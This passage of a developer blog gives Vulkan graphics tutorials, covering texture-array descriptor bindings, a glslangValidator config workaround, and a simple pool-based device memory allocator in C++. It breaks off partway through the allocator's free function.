Setting up a descriptor set binding to work with an array of textures looks very similar to setting it up to work with a single texture. The main difference is the “descriptorCount” variable on the VkDescriptorSetLayoutBinding structure: with a single texture you’d set this to 1, whereas with an array of textures, you set that variable to the number of elements in your array. For the above shader, the layout binding structure for the texture array might look like this:

VkDescriptorSetLayoutBinding layoutBinding = {};
layoutBinding.descriptorCount = 8;
layoutBinding.binding = 1;
layoutBinding.stageFlags = VK_SHADER_STAGE_FRAGMENT_BIT;
layoutBinding.descriptorType = VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE;
layoutBinding.pImmutableSamplers = 0;

In hindsight, this is pretty obvious, but it took me awhile to realize that “descriptorCount” was the right spot for this information.

Once the above is set up, you just create your DescriptorSet (and DescriptorSetLayout) like you would with any other layout binding types. The demo app I posted has a working example of all of that.

Writing the Descriptor Sets

Similar to the above, writing a texture array to a descriptor set is much more straightforward than it seems at first. The key is to have your VkDescriptorImageInfo structs already in an array. If you aren’t using a combined image sampler, you don’t actually need to fill in the sampler value on these structs. In my demo project, I set up this array like so:

//declared as a member of the demoData struct used below
VkDescriptorImageInfo	descriptorImageInfos[TEXTURE_ARRAY_SIZE];

for (uint32_t i = 0; i < TEXTURE_ARRAY_SIZE; ++i)
{
    //the sampler has its own binding, so no sampler handle is needed here
    demoData.descriptorImageInfos[i].sampler = VK_NULL_HANDLE;
    demoData.descriptorImageInfos[i].imageLayout = VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL;
    demoData.descriptorImageInfos[i].imageView = demoData.textures[i].view;
}

In a non contrived application, you likely won’t have all the imageViews already in a neat little array like this, but it doesn’t matter how those image views are laid out, as long as the DescriptorImageInfo structs you use are in an array of some kind.
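As a rough sketch of that point, here is one way the views could be gathered from a scattered container into a contiguous array. Everything here is an assumption for illustration: ImageInfoStandIn is a hypothetical stand-in for VkDescriptorImageInfo (with handles shown as plain integers so the snippet compiles without the Vulkan headers), the std::map is not how the demo stores its textures, and gatherImageInfos is a made-up helper name. Unused slots are pointed at a default view so every array element is valid.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <map>
#include <string>
#include <vector>

// Hypothetical stand-in for VkDescriptorImageInfo (handles shown as integers).
struct ImageInfoStandIn
{
    uint64_t sampler;     // left empty when the sampler is bound separately
    uint64_t imageView;
    int      imageLayout; // e.g. VK_IMAGE_LAYOUT_SHADER_READ_ONLY_OPTIMAL
};

// Copies views from a scattered container into one contiguous array.
// Slots without a texture fall back to defaultView.
std::vector<ImageInfoStandIn> gatherImageInfos(const std::map<std::string, uint64_t>& viewsByName,
                                               uint64_t defaultView,
                                               size_t arraySize,
                                               int readOnlyLayout)
{
    assert(viewsByName.size() <= arraySize);

    std::vector<ImageInfoStandIn> infos(arraySize, ImageInfoStandIn{ 0, defaultView, readOnlyLayout });

    size_t slot = 0;
    for (const auto& entry : viewsByName)
    {
        infos[slot++].imageView = entry.second;
    }
    return infos;
}
```

With the real Vulkan types, the equivalent of infos.data() is what pImageInfo would point at, and infos.size() is the descriptorCount.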

Once you’ve set up those structs, setting up the rest of the WriteDescriptorSet for the array of textures is very simple:

VkWriteDescriptorSet setWrites[2];

setWrites[1] = {};
setWrites[1].sType = VK_STRUCTURE_TYPE_WRITE_DESCRIPTOR_SET;
setWrites[1].dstBinding = 1;
setWrites[1].dstArrayElement = 0;
setWrites[1].descriptorType = VK_DESCRIPTOR_TYPE_SAMPLED_IMAGE;
setWrites[1].descriptorCount = TEXTURE_ARRAY_SIZE;
setWrites[1].pBufferInfo = 0;
setWrites[1].dstSet = demoData.descriptorSet;
setWrites[1].pImageInfo = demoData.descriptorImageInfos;

Note that just like earlier with the DescriptorSetLayoutBinding, the descriptorCount variable here is where you need to specify the length of your array.

GlslangValidator And Large Arrays

If you’re using the standalone glslangvalidator tool from the glslang project, you’re going to run into some issues if you try to make a large array of textures (i.e. more than 80). If you do that, you’ll see an error message like the following:

‘binding’ : sampler binding not less than gl_MaxCombinedTextureImageUnits (using array)

This was a problem for me because I want to keep all the textures used in any given frame bound, so my initial array size was set to 4096 (with all of those image views defaulting to the same image). As you probably guessed from the “gl_” prefix in the error being generated, this error doesn’t actually apply to Vulkan shaders, so if you’re sure that your shader will never be used by OpenGL, you need to tell the compiler not to worry about gl_MaxCombinedTextureImageUnits.

To do this, you need to create a device capabilities config file, like so:

glslangvalidator -c > myconf.conf

It’s important that your file uses the .conf extension, because that’s the extension that glslangvalidator will look for in its argument list to know if an alternate config file is being provided.

Once you have this config file, all you need to do is open it up in your favourite text editor and look for the “MaxCombinedTextureImageUnits” line:

MaxVertexAttribs 64
MaxVertexUniformComponents 4096
MaxVaryingFloats 64
MaxVertexTextureImageUnits 32
MaxCombinedTextureImageUnits 80
MaxTextureImageUnits 32

Change that 80 to a really big number and you’re on your way. One thing to note is that I ran into some issues when I did this originally because I generated the config file using powershell, which defaults to writing text files out using UCS-2 LE text encoding. You don’t want that. Make sure that your config file is set to a sane encoding, like UTF-8, otherwise the validator won’t be able to read the file back in properly.
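If you would rather script the edit than do it by hand, the sketch below shows the idea. It is only an illustration: raiseCombinedTextureLimit is a hypothetical helper, not part of glslang, and it assumes the config text has already been read into a std::string of single-byte characters.

```cpp
#include <cassert>
#include <sstream>
#include <string>

// Returns a copy of configText with the MaxCombinedTextureImageUnits line
// rewritten to use newLimit. All other lines are passed through unchanged.
std::string raiseCombinedTextureLimit(const std::string& configText, unsigned newLimit)
{
    const std::string key = "MaxCombinedTextureImageUnits";
    std::istringstream in(configText);
    std::ostringstream out;
    std::string line;

    while (std::getline(in, line))
    {
        // Match the key only at the start of a line and followed by a space,
        // so that e.g. MaxTextureImageUnits is left alone.
        const bool isTarget = line.compare(0, key.size(), key) == 0 &&
                              line.size() > key.size() &&
                              line[key.size()] == ' ';
        if (isTarget)
        {
            out << key << ' ' << newLimit << '\n';
        }
        else
        {
            out << line << '\n';
        }
    }
    return out.str();
}
```

Writing the returned string back out with a plain std::ofstream emits those bytes as they are, which should avoid the UCS-2 problem that the powershell redirect caused.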

Once you have your properly encoded config file, with its much larger texture limit, you are good to recompile your shader. This time, invoke the compiler like so:

glslangvalidator -V myfile.frag myconf.conf

As long as your config file uses the .conf extension, that should be all you need to get it to stop complaining and do its job.

That’s All Folks!

When all the above is done, you should be able to simply pass your array index via push constants the same way you’d pass anything else via push constants and be on your way. If anything above was unclear, let me point you again in the direction of the demo project on github, which will provide you with a relatively small working example.

Hopefully this was helpful! I realize it’s a short post, and there’s nothing here that’s groundbreaking, but (imo), Vulkan needs more easily digestible tutorial content, so here this post is. In any case, if you want to say hi, send a message to @khalladay on Twitter or on Mastodon. Thanks for reading!

A Simple Device Memory Allocator For Vulkan

2017-12-13T00:00:00+00:00

Last month, I posted about the material system that I’ve been trying to piece together, and talked about how the next step for that system was going to be to extend it to handle material instances. This sounded like a great next step until I started building it and realized that in order for this to work with arbitrary data, I needed to sort out how I wanted to manage allocating arbitrary amounts of Vulkan device memory.

Vulkan only gives you a limited number of allocations that you’re allowed to have active at one time (set by your gpu), so I can’t keep creating new allocations for every new material, and I definitely can’t for material instances. So instead of pressing forward with the material system, I took a quick detour to figure out how to write a memory allocator that would solve this problem for me.

If you’re not interested in the implementation details, GPUOpen already has a very capable memory allocator that’s open source and ready to use, and is way better than what I’ve put together (you can get it here) but I wanted to figure out how to write my own, which is what I’m going to talk about for the rest of this post.

I have no idea how to take a picture of an allocator

Understanding Vulkan Memory

The first thing I needed to take a look at was how exactly Vulkan memory worked, and there wasn’t a better spot than the output of vkGetPhysicalDeviceMemoryProperties.

On my GPU (GTX 1060), this reported that my device had 2 memory heaps: one that was 6 GB, and one that was 16 GB. This was interesting because, according to NVidia’s system stats, my gpu only has 14.2 GB of total graphics memory (and I never really figured out what this discrepancy was all about). However, the 6 GB number made sense, since that’s how much dedicated video memory I have on my card.

The only other information given about these heaps was a “flags” variable. A quick look at the Vulkan docs reveals that there’s only one flag defined right now:

typedef enum VkMemoryHeapFlagBits {
    VK_MEMORY_HEAP_DEVICE_LOCAL_BIT = 0x00000001,
} VkMemoryHeapFlagBits;

Which makes sense because my 6 GB heap is listed with a flags value of 1, making it the device local memory (which is what I’d expect, given that it’s my dedicated memory), and the other heap has a flags value of 0, which I assume just means that anything goes with that heap.

The other thing returned by vkGetPhysicalDeviceMemoryProperties is an array of memory types. These are important because when you’re allocating memory pools, you can’t mix memory types, so unlike on the CPU where you can malloc up as much as you want and parcel it out to anything, in Vulkan, you need multiple large allocations that you parcel out from based on type.

Vulkan memory types are identified by what heap they belong to, and which of the following property bits they have set:

typedef enum VkMemoryPropertyFlagBits {
    VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT = 0x00000001,
    VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT = 0x00000002,
    VK_MEMORY_PROPERTY_HOST_COHERENT_BIT = 0x00000004,
    VK_MEMORY_PROPERTY_HOST_CACHED_BIT = 0x00000008,
    VK_MEMORY_PROPERTY_LAZILY_ALLOCATED_BIT = 0x00000010,
} VkMemoryPropertyFlagBits;

On my machine, using the above information, I could determine the following about the memory types I have available:

7 memory types that use Heap 1 (all graphics memory), but have none of the above properties (wtf?)
2 memory types which have the VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT property, and are located in heap 0 (dedicated memory)
1 memory type which has the VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT and VK_MEMORY_PROPERTY_HOST_COHERENT_BIT properties, located in heap 1
1 memory type which has the VK_MEMORY_PROPERTY_HOST_CACHED_BIT, VK_MEMORY_PROPERTY_HOST_COHERENT_BIT, and VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT properties, in heap 1
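For reference, a list like the one above can be produced by decoding each memory type’s propertyFlags value into names. The sketch below is a hypothetical helper (describeMemoryProperties is my own name for it); the bit values are copied from the VkMemoryPropertyFlagBits enum shown earlier so that it compiles without the Vulkan headers.

```cpp
#include <cassert>
#include <cstdint>
#include <string>

// Turns a propertyFlags bitmask into a readable list of property names.
// Returns "none" when none of the five bits listed above are set.
std::string describeMemoryProperties(uint32_t flags)
{
    struct Name { uint32_t bit; const char* text; };
    static const Name names[] = {
        { 0x00000001, "DEVICE_LOCAL" },
        { 0x00000002, "HOST_VISIBLE" },
        { 0x00000004, "HOST_COHERENT" },
        { 0x00000008, "HOST_CACHED" },
        { 0x00000010, "LAZILY_ALLOCATED" },
    };

    std::string result;
    for (const Name& n : names)
    {
        if (flags & n.bit)
        {
            if (!result.empty()) result += " | ";
            result += n.text;
        }
    }
    return result.empty() ? std::string("none") : result;
}
```

In a real program, the flags argument would come from memoryTypes[i].propertyFlags in the struct filled by vkGetPhysicalDeviceMemoryProperties.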

Some of this makes sense, but wtf is going on with the duplicate memory types? Quick, REACT WITH BLAME!

This is NVidia’s Fault!

A quick jaunt over to the Vulkan Hardware Database shows that it’s only NVidia cards that have these extra memory types, and a quick trip to google turns up this article, which says that in addition to the memory types that Vulkan gives you, NVidia cards have additional types which are specialized for certain kinds of data. Fair enough, the problem is figuring out which of our mystery memory types are for what data.

Here’s where you really hope the article has an enum definition or something, but instead we get this:

A memory allocator that follows the rules and guidance of the Vulkan specification should be able to handle all these memory types gracefully by properly interpreting the VkMemoryRequirements::memoryTypeBits member when selecting an allocation for a specific resource.

Gee… thanks. Turns out, even when you’re working with Vulkan, you have to accept some amount of vendor specific magic behind the scenes.

Thankfully, the Vulkan spec gives us the exact bit of code we need to follow its “rules and guidance” when determining what memory type to use:

// Find a memory in `memoryTypeBitsRequirement` that includes all of `requiredProperties`
int32_t findProperties(const VkPhysicalDeviceMemoryProperties* pMemoryProperties,
                       uint32_t memoryTypeBitsRequirement,
                       VkMemoryPropertyFlags requiredProperties)
{
    const uint32_t memoryCount = pMemoryProperties->memoryTypeCount;

    for (uint32_t memoryIndex = 0; memoryIndex < memoryCount; ++memoryIndex)
    {
        const uint32_t memoryTypeBits = (1 << memoryIndex);
        const bool isRequiredMemoryType = memoryTypeBitsRequirement & memoryTypeBits;

        const VkMemoryPropertyFlags properties = pMemoryProperties->memoryTypes[memoryIndex].propertyFlags;
        const bool hasRequiredProperties = (properties & requiredProperties) == requiredProperties;

        if (isRequiredMemoryType && hasRequiredProperties)
        {
            return static_cast<int32_t>(memoryIndex);
        }
    }

    // failed to find memory type
    return -1;
}

So until I find a good reason to not use the above code exactly, I’m going to copy/paste the crap out of it.
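To convince myself of how the selection plays out, it helps to run the same logic against a made-up table. The sketch below reimplements the loop over a plain vector of property flags so it needs no Vulkan headers. The table in exampleTypes is hypothetical: it is loosely modelled on the 11 types listed earlier, but the index order is my assumption, not something the driver reported.

```cpp
#include <cassert>
#include <cstdint>
#include <vector>

constexpr uint32_t kDeviceLocal  = 0x1; // VK_MEMORY_PROPERTY_DEVICE_LOCAL_BIT
constexpr uint32_t kHostVisible  = 0x2; // VK_MEMORY_PROPERTY_HOST_VISIBLE_BIT
constexpr uint32_t kHostCoherent = 0x4; // VK_MEMORY_PROPERTY_HOST_COHERENT_BIT
constexpr uint32_t kHostCached   = 0x8; // VK_MEMORY_PROPERTY_HOST_CACHED_BIT

// Same selection logic as findProperties, but over a plain list of
// propertyFlags values (one entry per memory type index).
int32_t findMemoryType(const std::vector<uint32_t>& typeFlags,
                       uint32_t memoryTypeBits,
                       uint32_t requiredProperties)
{
    assert(typeFlags.size() <= 32); // one bit per type in memoryTypeBits

    for (uint32_t i = 0; i < typeFlags.size(); ++i)
    {
        const bool allowed  = (memoryTypeBits & (1u << i)) != 0;
        const bool hasProps = (typeFlags[i] & requiredProperties) == requiredProperties;
        if (allowed && hasProps) return static_cast<int32_t>(i);
    }
    return -1; // no suitable memory type
}

// Hypothetical table: 7 types with no properties, 2 device local,
// 2 host visible. The ordering is assumed for illustration.
std::vector<uint32_t> exampleTypes()
{
    std::vector<uint32_t> t(7, 0u);                          // indices 0-6
    t.push_back(kDeviceLocal);                               // index 7
    t.push_back(kDeviceLocal);                               // index 8
    t.push_back(kHostVisible | kHostCoherent);               // index 9
    t.push_back(kHostVisible | kHostCoherent | kHostCached); // index 10
    return t;
}
```

For a resource whose memoryTypeBits is 0x680 (types 7, 9 and 10 allowed), asking for host visible and host coherent memory picks index 9, while asking for device local memory picks index 7. The first match wins, which is why the order of the types matters.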

Allocating Device Memory

The next thing I looked into was how to allocate device memory. I almost skipped this step, given that I’ve built a few projects already, and figured that calling vkAllocateMemory was about all there was to it. Turns out I was wrong and there were a few things that I didn’t realize I needed to keep in mind. All this information comes from the Vulkan spec page for vkAllocateMemory, so if you want to go straight to the source, there it is.

Here are all the things I didn’t know about allocating device memory before I looked there:

vkAllocateMemory is guaranteed to return an allocation that is aligned to the largest alignment requirement for your Vulkan implementation (ie: if one resource type needs to be 16 byte aligned, and another type 128 byte aligned, all vkAllocateMemory calls will be 128 byte aligned), so you never have to worry about the alignment of these allocs.
Some platforms limit the maximum size a single allocation can be, and this limit can be different for each memory type. So if you’re getting VK_ERROR_OUT_OF_DEVICE_MEMORY errors but don’t see an obvious cause, that may be it.
There is a limit to the amount of memory available in each memory heap your implementation provides (found in vkGetPhysicalDeviceMemoryProperties).
The vkAllocateMemory call has a parameter for a VkAllocationCallbacks structure, which can be used to provide custom allocators for host memory. I’m ignoring this today, but it’s good to know what that argument is for.

Finally, as mentioned earlier, Vulkan limits the number of VkDeviceMemory allocations you can have active at one time. You can grab the limit from the maxMemoryAllocationCount member of VkPhysicalDeviceLimits (on my gpu, the limit was 4096). If you try to exceed this limit, you get VK_ERROR_TOO_MANY_OBJECTS. This allocation count limit is the reason for all of this work: I don’t want to write a material instancing system that bogarts all my allocations.

Binding Memory And Freeing Resources

Assuming that all of the nuances of allocating memory have been properly handled, there’s still the matter of actually using that memory. In Vulkan, this means “binding” a buffer or image to some region of a VkDeviceMemory allocation. Luckily this is much more straightforward than allocating the memory: all you need to do is call a binding function, like one of these:

VkResult vkBindBufferMemory(
    VkDevice                                    device,
    VkBuffer                                    buffer,
    VkDeviceMemory                              memory,
    VkDeviceSize                                memoryOffset);

VkResult vkBindImageMemory(
    VkDevice                                    device,
    VkImage                                     image,
    VkDeviceMemory                              memory,
    VkDeviceSize                                memoryOffset);

Unlike vkAllocateMemory, which I brought up specifically to talk about all the gotchas, the functions used to bind memory are really simple. Instead, I’m mentioning this one to provide some info about how I decided on the structure of my allocator. Since any allocator that will solve the allocation count limit problem is going to be subdividing up large allocations, any call to allocate memory needs to return both the VkDeviceMemory handle for the large allocation we’re subdividing, and the offset into that allocation used for this specific resource so that the allocation can be bound correctly.

I ended up settling on this:

struct Allocation
{
    VkDeviceMemory handle;
    uint32_t type;
    uint32_t id;
    VkDeviceSize size;
    VkDeviceSize offset;
};

The only thing that may not be readily apparent is the id variable, which I’m adding since I’m assuming at some point I’ll need some extra bits to help find the allocation inside a memory pool.

It’s worth noting that once you bind memory to a Vulkan resource, the only way you can unbind that memory is to destroy the buffer, image, or whatever else that memory is bound to. You can free memory that’s currently bound to something (as long as you make sure to stop using whatever it was bound to), but you can’t decide to bind an allocated chunk of memory to something new until the original binding has been destroyed.

Whew, all that theory is finally out of the way! It’s time to actually build something.

A Basic Allocator Structure

For my project, all I did was define some function pointers for allocating things, and then have whatever allocator I wanted to use write to those pointers with its own functions. Sure, this means that I can’t have multiple allocators in use at once, but I think I’m having the right amount of fun just worrying about 1 allocator right now. I already have a global struct called vkh::Context (vkh is the namespace for my “vulkan helper” code), so I just added another member to this struct that looks like so:

struct AllocatorInterface
{
    //setup the allocator
    //args: vkh context structure
    void(*activate)(VkhContext*);

    //args: mem handle, size of alloc, mem type
    void(*alloc)(Allocation&, VkDeviceSize, uint32_t);

    //args: mem handle
    void(*free)(Allocation&);

    //args: memory type
    size_t(*allocatedSize)(uint32_t);

    //returns total number of active vulkan allocs
    uint32_t(*numAllocs)();
};

The VkhContext structure can be found on github in vkh.h.
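To show how an allocator plugs itself into a struct of function pointers like this, here is a stripped-down sketch. It is not the code from vkh.h: the Allocation and AllocatorInterface structs are trimmed, hypothetical versions, and counting_allocator is a made-up allocator that only counts calls and never touches the GPU.

```cpp
#include <cassert>
#include <cstdint>

// Hypothetical, trimmed-down versions of the structs above.
struct Allocation { uint64_t size; uint32_t type; };

struct AllocatorInterface
{
    void(*alloc)(Allocation&, uint64_t, uint32_t);
    void(*free)(Allocation&);
    uint32_t(*numAllocs)();
};

namespace counting_allocator
{
    // State shared by the functions below, like the `state` struct in the post.
    static uint32_t liveAllocs = 0;

    void alloc(Allocation& out, uint64_t size, uint32_t memoryType)
    {
        out.size = size;
        out.type = memoryType;
        ++liveAllocs;
    }

    void free(Allocation&)
    {
        assert(liveAllocs > 0);
        --liveAllocs;
    }

    uint32_t numAllocs() { return liveAllocs; }

    // Plays the role of activate(): points the interface at this allocator.
    void install(AllocatorInterface& iface)
    {
        iface.alloc = alloc;
        iface.free = free;
        iface.numAllocs = numAllocs;
    }
}
```

Calling code only ever goes through the interface (iface.alloc, iface.free, iface.numAllocs), so swapping in a different allocator is a matter of calling a different install function.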

A Passthrough Allocator

To start things off, I decided that I wanted to build an allocator that did nothing, or rather, that just made the exact same calls that my program code was making otherwise, but routed through this “passthrough” allocator. This gave me a starting place for defining the interface I needed, and was pretty simple, since all my code already routed calls to allocate memory through two functions.

I’ll leave out the activate function because it’s specific to my program, and boring. Instead I want to start by showing off the allocate function:

void alloc(Allocation& outAlloc, VkDeviceSize size, uint32_t memoryType)
{
    state.totalAllocs++;
    state.memTypeAllocSizes[memoryType] += size;

    VkMemoryAllocateInfo allocInfo = vkh::memoryAllocateInfo(size, memoryType);
    VkResult res = vkAllocateMemory(state.context->device, &allocInfo, nullptr, &(outAlloc.handle));

    outAlloc.size = size;
    outAlloc.type = memoryType;
    outAlloc.offset = 0;

    checkf(res != VK_ERROR_OUT_OF_DEVICE_MEMORY, "Out of device memory");
    checkf(res != VK_ERROR_TOO_MANY_OBJECTS, "Attempting to create too many allocations");
    checkf(res == VK_SUCCESS, "Error allocating memory in passthrough allocator");
}

Ok, so this function is also pretty boring in the passthrough allocator, but there’s a couple of key things to note:

All the errors I mentioned earlier are checked for. The checkf function is essentially a macro for an assert that prints a log message and pops up a message window if it fails.
Even though we aren’t using it in this allocator, the Allocation structure we’re returning gets its offset set to 0 so that we can pass the offset to bind calls later.

With the allocation code out of the way, the rest of the allocator interface is pretty boring to look at:

void free(Allocation& allocation)
{
    state.totalAllocs--;
    state.memTypeAllocSizes[allocation.type] -= allocation.size;
    vkFreeMemory(state.context->device, (allocation.handle), nullptr);
}

size_t allocatedSize(uint32_t memoryType)
{
    return state.memTypeAllocSizes[memoryType];
}

uint32_t numAllocs()
{
    return state.totalAllocs;
}

The entire source for this class is available on github, but the above is the part that matters for what I’m talking about right now.

What’s nice about this is that even though it really isn’t doing anything interesting, it at least gives us a bit more insight into our memory use, which is certainly useful by itself. For example I know that the material system demo app I posted last month needs 11 active allocations to render the frame, which is more than I knew last month when I wrote the thing.

A Better Allocator Structure

Despite being pretty useful, the passthrough allocator didn’t solve the allocation count problem that I needed to solve. I needed to do something a bit more interesting.

So here’s what I ended up resolving to build (remember, I just wanted something functional, so don’t take any of this as a great idea):

The allocator needs separate memory pools, one for each type of vulkan memory (this is required by the spec anyway)
Each pool is made up of an array of large VkDeviceMemory allocations and associated usage data about those allocations
When something needs memory, I’ll go through each large allocation, looking for the first large enough memory chunk in an allocation’s usage data
If no gap is found, I’ll create a new large allocation to use, and add it to that pool’s array.

There are lots of details that real allocators worry about that the above doesn’t begin to cover, but I’m already down this rabbit hole far enough for my liking right now, and this minimal allocator suits my current needs just fine.
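The search described in that list is a first-fit strategy. A minimal sketch of it, using hypothetical types and names (FreeSpan, Location, PoolLayout, findFirstFit and findOrGrow are all mine, not the names used in the repo), might look like this:

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

struct FreeSpan { uint64_t offset; uint64_t size; };
struct Location { size_t blockIdx; size_t spanIdx; };

// Each inner vector lists the free spans of one large allocation.
using PoolLayout = std::vector<std::vector<FreeSpan>>;

// First-fit search: returns true and fills `out` with the first free span
// that can hold `size` bytes; returns false if nothing fits.
bool findFirstFit(const PoolLayout& pool, uint64_t size, Location& out)
{
    for (size_t b = 0; b < pool.size(); ++b)
    {
        for (size_t s = 0; s < pool[b].size(); ++s)
        {
            if (pool[b][s].size >= size)
            {
                out = Location{ b, s };
                return true;
            }
        }
    }
    return false;
}

// Mirrors the last bullet: when nothing fits, append a fresh block that is
// one big free span, and hand back its location.
Location findOrGrow(PoolLayout& pool, uint64_t size, uint64_t newBlockSize)
{
    Location loc{};
    if (findFirstFit(pool, size, loc)) return loc;

    assert(newBlockSize >= size);
    pool.push_back(std::vector<FreeSpan>{ FreeSpan{ 0, newBlockSize } });
    return Location{ pool.size() - 1, 0 };
}
```

First-fit is simple and fast to write, at the cost of fragmenting blocks more than a best-fit search would.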

How Subdividing Device Memory Works

The basics of subdividing device memory are simple: call vkBindBufferMemory or vkBindImageMemory with the VkDeviceMemory handle of the allocation you’re subdividing, and use the offset argument to select where in that allocation to go. Still, I figured there had to be more to it than that. One of the things I was sure that I needed to figure out was how to decide how big to make my large allocations, or heck, even how big a memory page is on the gpu.

Reading through the spec (11.6. Resource Memory Association), I noticed the concept of “buffer-image granularity.” The description in the spec was fairly confusing, but what I took away from it is that in addition to alignment concerns when sub allocating from a larger device memory allocation, if you’re going to be using the same alloc for buffers and images, you also need to space them far enough apart within the alloc to satisfy this implementation defined value. If you screw this up, your validation layer will let you know with the message:

Linear buffer 0xXX is aliased with non-linear image 0xXX which may indicate a bug. For further info refer to the Buffer-Image Granularity section of the Vulkan specification. (https://www.khronos.org/registry/vulkan/specs/1.0-extensions/xhtml/vkspec.html#resources-bufferimagegranularity)

So I’m using this buffer-image granularity number as my page size for allocations, and only ever allocating large blocks which are a multiple of that size for simplicity.
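Rounding a requested size up to a whole number of pages is a one-liner. The sketch below is a generic helper (roundUpToPage is a hypothetical name, and the 1024 in the example is just a sample granularity, not a value from my card):

```cpp
#include <cassert>
#include <cstdint>

// Rounds size up to the next multiple of pageSize.
// A size that is already a multiple is returned unchanged.
uint64_t roundUpToPage(uint64_t size, uint64_t pageSize)
{
    assert(pageSize > 0);
    return ((size + pageSize - 1) / pageSize) * pageSize;
}
```

With a page size of 1024, a request for 1 byte becomes 1024, a request for 1024 stays at 1024, and a request for 1025 becomes 2048. The alloc function later in this post uses the slightly different formula ((size / pageSize) + 1) * pageSize, which gives the same answer except that exact multiples get one extra page.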

Another thing to keep in mind is that different memory types can’t share the same VkDeviceMemory allocation, so we’ll need a memory pool for each memoryType returned for our GPU (on my card, this meant that I’d need up to 11 memory pools).

The Pool Allocator

Finally, we get to the good stuff. The Pool Allocator is what I ended up with after cramming all of the above into my head. I’ve talked about it enough already, so let’s actually get to the code. To start off, I want to talk about the couple of structs that I’m using to track allocators, and allocator state data:

struct OffsetSize { uint64_t offset; uint64_t size; };
struct BlockSpanIndexPair { uint32_t blockIdx; uint32_t spanIdx; };

struct DeviceMemoryBlock
{
    Allocation mem;
    std::vector<OffsetSize> layout;
};

struct MemoryPool
{
    std::vector<DeviceMemoryBlock> blocks;
};

struct AllocatorState
{
    VkhContext* context;

    std::vector<size_t> memTypeAllocSizes;
    uint32_t totalAllocs;

    uint32_t pageSize;
    VkDeviceSize memoryBlockMinSize;

    std::vector<MemoryPool> memPools;
};

So yeah… that’s a lot of nested vectors, but it works and that’s good enough for me right now. I’m sure someone reading this has strong opinions about a better way to structure this and I’d actually really love to hear about it on Twitter, but for this article, I’m going with the above.

The first two structs at the beginning are really just more convenient std::pairs. I hate pairs because .first and .second get really hard to read really fast, and these just give me more useful member names.

The AllocatorState structure is the real meat of the above snippet. For the most part it’s probably pretty self-explanatory, but the few variables that aren’t probably make more sense in the context of the activate function, which is less boring than the passthrough allocator’s:

void activate(VkhContext* context)
{
    context->allocator = allocImpl;
    state.context = context;

    VkPhysicalDeviceMemoryProperties memProperties;
    vkGetPhysicalDeviceMemoryProperties(context->gpu.device, &memProperties);

    state.memTypeAllocSizes.resize(memProperties.memoryTypeCount);
    state.memPools.resize(memProperties.memoryTypeCount);

    state.pageSize = context->gpu.deviceProps.limits.bufferImageGranularity;
    state.memoryBlockMinSize = state.pageSize * 10;
}

I chose the minimum block size at random, and in practice that number is probably the most important one for making sure this allocator performs the best it can (ideally large enough that every large allocation will be able to be broken up by multiple requests). My app is so simple that I’m not worrying about using up all my graphics memory, so I probably could have made this 10x larger than it is, but that seemed like an even dumber idea than what I did.

The rest of that function pretty much documents itself, but without it, the allocate function would have made a lot less sense:

void alloc(Allocation& outAlloc, VkDeviceSize size, uint32_t memoryType)
{
    MemoryPool& pool = state.memPools[memoryType];

    //make sure we always alloc a multiple of pageSize
    VkDeviceSize requestedAllocSize = ((size / state.pageSize) + 1) * state.pageSize;
    state.memTypeAllocSizes[memoryType] += requestedAllocSize;

    BlockSpanIndexPair location;
    bool found = findFreeChunkForAllocation(location, memoryType, requestedAllocSize);

    if (!found)
    {
        location = { addBlockToPool(requestedAllocSize, memoryType), 0 };
    }

    outAlloc.handle = pool.blocks[location.blockIdx].mem.handle;
    outAlloc.size = size;
    outAlloc.offset = pool.blocks[location.blockIdx].layout[location.spanIdx].offset;
    outAlloc.type = memoryType;
    outAlloc.id = location.blockIdx;

    markChunkOfMemoryBlockUsed(memoryType, location, requestedAllocSize);
}

The most important thing to note in this function is that no matter how big the allocation we need is, the allocator rounds it up to a multiple of our page size and uses that (as written, the formula adds a full extra page when the size is already an exact multiple, which wastes a little memory but is otherwise harmless). The only thing that needs the originally requested allocation size is the structure we’re returning to the caller (since it needs the correct size for the bind function).

This function itself is pretty straightforward, as are the couple of functions I haven’t pasted here. findFreeChunkForAllocation returns a location inside our target MemoryPool that can fit the allocation we want to make. If it can’t find space, we have to make space by adding a new block to the pool (that function returns the new block’s index in the memory pool), which is what addBlockToPool does.

Finally, after we build our allocation structure, we have to update the usage data for the DeviceMemoryBlock we’re using to make sure we know what regions of memory are already in use.

The code for all of these functions is on the github repo (I’ve linked directly to the allocator’s .cpp file), so click through if you’re interested. I’m going to omit them here for brevity.
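For readers who don’t want to click through, here is a rough sketch of what the “mark used” step could look like. This is not the repo’s markChunkOfMemoryBlockUsed: markSpanUsed is a hypothetical stand-in that assumes the allocation always takes the front of the chosen free span, which matches how alloc reads the span’s offset before updating the layout.

```cpp
#include <cassert>
#include <cstddef>
#include <cstdint>
#include <vector>

struct OffsetSize { uint64_t offset; uint64_t size; };

// Carves `size` bytes off the front of the free span at spanIdx.
// The span is removed entirely once nothing is left in it.
void markSpanUsed(std::vector<OffsetSize>& layout, size_t spanIdx, uint64_t size)
{
    assert(spanIdx < layout.size());
    OffsetSize& span = layout[spanIdx];
    assert(size <= span.size);

    span.offset += size; // the free region now starts after the allocation
    span.size   -= size;

    if (span.size == 0)
    {
        layout.erase(layout.begin() + static_cast<std::ptrdiff_t>(spanIdx));
    }
}
```

Starting from a single free span of 4096 bytes at offset 0, taking 1024 bytes leaves a free span of 3072 bytes at offset 1024, and taking the remaining 3072 bytes leaves the layout empty.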

One function I’m not going to omit is the free function:

void free(Allocation& allocation)
{
    VkDeviceSize requestedAllocSize = ((allocation.size / state.pageSize) + 1) * state.pageSize;

    OffsetSize span = {allocation.offset, requestedAllocSize };

    MemoryPool& pool = state.memPools[allocation.type];
    bool found = false;
    for (uint32_t j = 0; j < pool.blocks[allocation.id].layout.size(); ++j)
    {
        if (pool.blocks[allocation.id].layout[j].offset == requestedAllocSize +allocation.offset)
        {
            pool.blocks[allocation.id].layout[j].offset = allocation.offset;
            pool.blocks[allocation.id].layout[j].size += requestedAllocSize;
            found = true;
            break;
        }
    }

    if (!found)
    {
        state.memPools[allocation.type].blocks[allocation.id].layout.push_back(span);
    }

